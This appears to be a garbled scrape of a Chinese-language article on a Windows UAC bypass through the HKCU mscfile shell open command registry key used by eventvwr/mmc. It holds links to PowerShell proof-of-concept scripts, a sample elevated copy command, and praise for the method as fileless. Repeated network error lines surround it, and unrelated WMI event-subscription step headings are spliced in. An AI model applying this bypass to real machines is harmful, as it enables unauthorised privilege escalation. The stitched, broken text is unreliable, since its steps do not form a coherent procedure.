Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer Failure when receiving data from the peer 接下来,如果将有效内容添加到注册表HKCU \ Software \ Classes \ mscfile \ shell \ open \ command,则可以在启动mmc.exe之前执行默认有效内容。 最重要的一点:修改HKCU \ Software \ Classes \ mscfile \ shell \ open \ command的注册表值只需要普通的用户权限。 1、Create an __EventFilterinstance 作者分享了PowerShell实现的poc代码,链接如下: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 如果poc成功执行,它将在C: \ UACBypassTest下写入“Is Elevated: True” 注意:默认操作c: \目录中的文件将被uac拦截 我分叉了作者的代码,做了一些小修改,并运行了以下命令: C: \ Windows \ System32 \ cmd.exe/c copyc: \ test \ 1.txt c: \ 1.txt 地址是:https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1 2、Create an __EventConsumerinstance 该方法与传统方法有很大不同,其优点如下: • 没有文件 • 不需要进程注入 • 不需要复制特权文件 Failure when receiving data from the peer